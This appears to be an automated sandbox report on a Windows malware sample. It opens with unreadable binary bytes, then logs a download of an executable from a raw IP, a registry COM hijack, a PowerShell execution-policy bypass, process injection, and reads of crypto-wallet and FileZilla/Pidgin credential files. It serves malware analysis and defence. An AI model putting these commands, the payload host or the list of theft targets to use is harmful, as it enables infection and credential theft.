ÿuÿXpH]ÃU‹ì‹E‰‹Á]ÂU‹ìÿuMèäÿÿÿh°J‹ÁPè8ÌÌÿ<pH·ÈÉ€…ÀNÈQèÊÿÿÿÌU‹ì‹E…Àt$ƒø tƒøt ƒø"tƒøPuëhW€ëh€ë]Ãh@€èÿÿÿÌV3öVVQÿ pH…Àuÿ<pH·ðÎ€…ÀNð‹Æ^ÃU‹ìSVW‹ú‹ÙWSÿ`pH…Àt@PÿLpH‹ð…öt3WSÿ$qH‹U ƒâv;ñs·4FƒÆƒêuî;ñs fƒ>t‹Æë3À_^[]ÀyÇzItƒyt ÿqÿtpHÃU‹ìÿujÿqÿhpH]ÂU‹ìƒ}tÿujÿqÿ”pH]ÂU‹ì‹U…Òu ‹ÿu ÿëƒ} u ‹RÿP3Àëÿu RjÿqÿPpH]ÂU‹ìÿujÿqÿ,pH]ÂU‹ìV‹ñè^ÿÿÿöEt j V豛YY‹Æ^]Âd¡,VW‹0¡ WJ;†~C¿ WJWè—ƒ= WJÿYu.ÿˆpHhíUHÇdWJzI£hWJÆlWJèA›W蚖YY¡p^J¿LNJ;†~`¾p^JVèŖƒ=p^JÿYuKƒ%XNJ3Àƒ%\NJhêUHÇLNJ|zIÇPNJdWJÇ`NJ£dNJ‰=TNJèϚVè(–YY‹Ç_^ÃU‹ì‹UVW‹ù…ÒxP¸ÿÿÿ+ƒø|DBrƒæø;Ö9‹Æ÷e …Òw0rƒøÿw)ƒøïw$‹OPR‹ÿ…Àtƒ`Nÿ‰8Ç@ ‰Hë3À_^]ÂU‹ì‹I‹]ÿ`U‹ì‹U V…ÒxG¸ÿÿÿ+ƒø|;Brƒæø;Ö0‹Æ÷e…Òw'rƒøÿw ƒøïw‹IPRÿu‹ÿP…ÀtNÿ‰Hë3À^] ðÿAAËÁÃU‹ìöEV‹ñt jVèí™YY‹Æ^]Âd¡,‹¡ÔXJ;~eV¾ÔXJVèW•ƒ=ÔXJÿYuN3ÀPPhˆMJ£„MJ£ MJ£¤MJÿ pH…Àuÿ<pH·ÈÉ€…ÀNȉ ¤MJh÷UHè^™V跔YY^¸„MJÃV‹ñW~Wÿ pHƒ>tÿ6ÿ|rHƒ&WÿpH_^ÃU‹ìV‹ñèöEt j4Vè#™YY‹Æ^]‹AÇPzI…Àt'ƒI ÿ3҃I$ÿP‰Q‰Q‰Q ‰Q‰Q‰Qf‰QÿpHVWèûþÿÿ‹ð~Wÿ pHƒnu‹ÎèbÿÿÿWÿpH_^ø9Hè±ÅìSVWj…äþÿÿ‹ÚQàþÿÿ‰…àþÿÿè䓃eü3ö9u †™{,ÿ7Mè躌ÆEüƒeðEðPQEäPMèèô‹ÆEüÿ0ÿ(rHPMì茌MäÆEüèm•ƒ}ðÿt!ƒ½àþÿÿ„˜ÿµàþÿÿÿuìèfèYY…ÀtdMìÆEüè:•ƒ}ðÿu•MèÆEüè(•FƒÇL;u ‚jÿÿÿ‹]¾@sH‹û¥¥¥¥…äþÿÿ9…àþÿÿt ÿµàþÿÿèY‹Mô‹Ã_^[d‰ ÉÃköLMìó‹]‹û¥¥¥¥è̔MèèĔëµh@€è*úÿÿÌU‹ìd¡jÿh@HPd‰%ƒì<SVW‹Ùèxýÿÿ‹ðƒ~ …~Wÿ pH3À3É@‰Eè9u+‰EȍEØPEȉMÌPV‰MЉMÔÿ„rH3ÒB¶Ê3҅ÀEʈMèWÿpH€}脼EìPEäPÿprH…À…¦‹Eì3ö‰uð‰uè=w‹Èèèøÿÿ„À‹Eìt èæš‹üëPMèèa‹‹uè‹ø‰uð…ÿtRWÿuìÿuäÿxrH…ÀuSjh@sHh|±HèQ³ƒÄ …ÀuXÿu‹uäÿ,rHMȋ×VQ‹Èè«ýÿÿYY‹ðë|V‹6èœ Y…öuóéV‹6èŠ Y…öuó¸@€e¬‹Môd‰ _^[É‹Eä3ö‰E܅Àt)G‰Eàjh|±HPèÓ²ƒÄ …ÀtA‹EàFƒÀL‰Eà;uÜrݾ@sH}È¥¥¥¥uȍ}¸¥E¸jh@sHP¥¥¥è—²ƒÄ …Àu‹uðëköL÷ëÌV‹6èö Y…öuóégÿÿÿƒ}„Lÿuè:ñYj@Y÷é‹ð…ҏ3| þÿÿÿ‡%ƒúÿŒ þ€‚‹ÆÑè‰E܁þ‹Îèd÷ÿÿ„Àt‹Æèc™‹uð‹üëVMèèۉ‹uè‹ø‰uð…ÿ„ÍÿuÜ3ÀWjÿÿuf‰Pjÿ0pH…À„®ƒeE€{PtHÿsh &ÿsÿsÿs ÿlrHjE¸PWÿuÿhrHÿu…ÀtVÿtrHë V‹6èø Y…öuóéiþÿÿjÿsÿ€rHjE¸PWÿuÿhrHÿu…ÀtÿtrHë V‹6è¼ Y…öuóé-þÿÿÿtrHë V‹6è
Data received ·Gf;Æ…‚‹Ïèþÿu˜Wèÿÿÿ‹u€Y„À‹E„YtW;Æ}h€u‹Ïè½·GPÿµlÿÿÿèdÿÿYYƒø s5Š€Ô‰H‹Mˆˆ…XÿÿÿÿµXÿÿÿè™ÀüÿÿE„‹Ïèÿu˜W螏ÿÿë ;Æ}ë‹E„ÆE§ë‹u€‹E„‹Mˆƒyu ÆE§éoþÿÿ;ƍgþÿÿ‹}ˆ+ðj0‹ÏèGÀüÿƒîuò‹½TÿÿÿéIþÿÿÿu˜WèFÿÿYY„À„óûÿÿ‹E ‹‹pEØP‹ÎÿŒrH‹M ÿց˃ËÆEüƒ}è‰]œvR‹E ‹‹pEÀP‹ÎÿŒrH‹M ÿց˃ËÇEüƒ}ԍuÀ‰]œr‹uÀ€u‹Ï裷GÆE¦f9tÆE¦öÃtƒãûMÀ‰]œèœ½üÿÇEüöÃtƒãýM؉]œè‚½üÿ€}¦tR‹Ïès‹E MÀQ‹‹p‹ÎÿŒrH‹M ÿÖƅPÿÿÿEÀÿµPÿÿÿËM¨P‰]‰]œèß¾üÿMÀè/½üÿééúÿÿ‹E ‹‹p EØP‹ÎÿŒrH‹M ÿց˃ËÆEüƒ}è‰]œvR‹E ‹‹p EÀP‹ÎÿŒrH‹M ÿց˃ËÇEü ƒ}ԍuÀ‰]œr‹uÀ€u‹Ïè™·GÆE¦f9tÆE¦öÃtƒãïMÀ‰]œè’¼üÿÇEüöÃtƒã÷M؉]œèx¼üÿ€}¦tV‹Ïèi‹E MÀQ‹‹p ‹ÎÿŒrH‹M ÿÖƅtÿÿÿEÀÿµtÿÿÿË M¨P‰]‰]œèÕ½üÿMÀè%¼üÿÆE¥éÛùÿÿ‹E ‹‹pEØP‹ÎÿŒrH‹M ÿցË@ƒË ÆEü ƒ}è‰]‰]œt/‹E ‹‹p EÀP‹ÎÿŒrH‹M ÿցË@€ÆE¦ƒ}Љ]‰]œtÆE¦öÃ@tƒã¿MÀ‰]‰]œè¡»üÿÇEüöà tƒãߍM؉]‰]œè„»üÿ€}¦ŠE§„9ùÿÿÆE¥é0ùÿÿ‹E ‹‹pEØP‹ÎÿŒrH‹M ÿցˀ‰]‰]œ‹…xÿÿÿ‹u˜ÆEüö@u/VWè7ŒÿÿYY„Àt"€u‹Ïèÿƒ}ìEØ·Or‹EØf;u<ƒ½|ÿÿÿuHƒ}¸wBV‹Ïèàk„Àu!8Gu‹ÏèÃ}ìEØ·Or‹EØf;tƒ}ìEØr‹E؃eè3Éf‰ƒ}ìuØr‹uØÿu˜W詋ÿÿYY„ÀtI‹]˜ƒ}ìMØr‹M؋EèA;ðt-€u‹ÏèX·Gf;u‹ÏƒÆè`SWèc‹ÿÿYY„Àu½‹]ƒ}ìMØr‹M؋EèA;ðtÆE§ÆEüMØéøüÿÿƒ½|ÿÿÿ„Þ÷ÿÿÿu˜ÆE¦Wè‹ÿÿYY„ÀtQ‹]˜€u‹Ïèß‹·OQjH‹p‹ÎÿŒrH‹hÿÿÿÿքÀt‹ÏÆE¦èÏSWèҊÿÿ‹µhÿÿÿYY„Àuµ‹]‹…|ÿÿÿ€¼dÿÿÿ …f÷ÿÿ€}¦…\÷ÿÿ°ˆE§éU÷ÿÿ‹M¸ƒù†…ƒ}¼u¨r‹u¨ŠE¥ˆE¥ƒÆE¨ƒ}¼r‹E¨H;ðt4ÿu˜Wè^ŠÿÿYY„Àt"€u‹Ïè&f‹Gf;u ‹Ïè1‹M¸ë¹‹M¸ƒ}¼E¨r‹E¨H;ðt‹uˆ‹Æƒ~r‹ƒfÆë€}¥‹uˆt j-jj‹Î臀ÿÿ‹E¼ƒør>‹M¨E‰…xÿÿÿ‰MŒ=r…xÿÿÿPEŒPèý
Data sent GET /po/tai1.exe HTTP/1.1 Host: 23.92.213.108 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Code injection with CreateRemoteThread in a remote process rule inject_thread
description Create a windows service rule create_service
description Communications over UDP network rule network_udp_sock
description Listen for incoming communication rule network_tcp_listen
description Communications over P2P network rule network_p2p_win
description Communications over HTTP rule network_http
description File downloader/dropper rule network_dropper
description Communications over FTP rule network_ftp
description Communications over RAW socket rule network_tcp_socket
description Communications use DNS rule network_dns
description Communication using dga rule network_dga
description Escalade priviledges rule escalate_priv
description Take screenshot rule screenshot
description Run a keylogger rule keylogger
description Steal credential rule cred_local
description Record Audio rule sniff_audio
description APC queue tasks migration rule migrate_apc
description Malware can spread east-west using share drive rule spreading_share
description Create or check mutex rule win_mutex
description Affect system registries rule win_registry
description Affect system token rule win_token
description Affect private profile rule win_private_profile
description Affect private profile rule win_files_operation
description Match Winsock 2 API library declaration rule Str_Win32_Winsock2_Library
description Match Windows Inet API library declaration rule Str_Win32_Wininet_Library
description Match Windows Inet API call rule Str_Win32_Internet_API
description Match Windows Http API call rule Str_Win32_Http_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
Time & API Arguments Status Return Repeated

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 7748
process_handle: 0x000000d8
0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 7748
process_handle: 0x000000d8
3221225738 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 8324
process_handle: 0x000000d8
0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 8324
process_handle: 0x000000d8
3221225738 0
cmdline "C:\Windows\sysnative\cmd" /c "C:\Users\test22\AppData\Local\Temp\42.tmp\43.tmp\44.bat C:\Users\test22\AppData\Local\Temp\aXSz3.exe"
cmdline "C:\Windows\sysnative\cmd" /c "C:\Users\test22\AppData\Local\Temp\FE6D.tmp\FE6E.tmp\FE6F.bat C:\Users\test22\AppData\Local\Temp\aXSz3.exe"
cmdline REG ADD HKCU\Software\Classes\CLSID\{fIVyUCyCgmYerDKhxywzCYHpaydQNEHJFGMJlsvEUxVbJBYZdTsUZShIZHHQYTVJJZjgDNeeOnJQOdvxQbp00e52-a214-4aGfgWBQtvSqxOkOREyJyBKuXxCVZOBjjnsGfdicRWTGVQHmjYPtuuQkXOxZYqUvnYGCdbzhxPoRzVpxIvPgNZuuByZUC-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
cmdline REG ADD HKCU\Software\Classes\CLSID\{fIVyUCyCgmYerDKhxywzCYHpaydQNEHJFGMJlsvEUxVbJBYZdTsUZShIZHHQYTVJJZjgDNeeOnJQOdvxQbp00e52-a214-4aGfgWBQtvSqxOkOREyJyBKuXxCVZOBjjnsGfdicRWTGVQHmjYPtuuQkXOxZYqUvnYGCdbzhxPoRzVpxIvPgNZuuByZUC-8fba-4357bb0072ec} /f
host 172.217.25.14
host 23.92.213.108
file C:\wallet.dat
file C:\Users\test22\AppData\Roaming\Electrum\wallets
file C:\Users\test22\AppData\Local\Temp\42.tmp\43.tmp\44.bat
file C:\Users\test22\AppData\Local\Temp\42.tmp
file C:\Users\test22\AppData\Local\Temp\42.tmp\43.tmp
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x00000230
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
file C:\Users\Default\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\Default User\AppData\Roaming\FileZilla\recentservers.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
file C:\Users\Default\AppData\Roaming\FileZilla\recentservers.xml
file C:\Users\Public\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\Public\AppData\Roaming\FileZilla\recentservers.xml
file C:\Users\Default User\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\All Users\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\All Users\AppData\Roaming\FileZilla\recentservers.xml
file C:\Users\All Users\AppData\Roaming\.purple\accounts.xml
file C:\Users\Default User\AppData\Roaming\.purple\accounts.xml
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
file C:\Users\Default\AppData\Roaming\.purple\accounts.xml
file C:\Users\Public\AppData\Roaming\.purple\accounts.xml
Time & API Arguments Status Return Repeated

send

 buffer: GET /po/tai1.exe HTTP/1.1 Host: 23.92.213.108 Connection: Keep-Alive
socket: 1260
sent: 74
1 74 0
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\DyEqOdpm.exe"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\DyEqOdpm.exe
Process injection Process 7748 resumed a thread in remote process 7232
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000000000000006c
suspend_count: 0
process_identifier: 7232
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -executionpolicy bypass value Attempts to bypass execution policy
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\test22\AppData\Local\Temp\DyEqOdpm.exe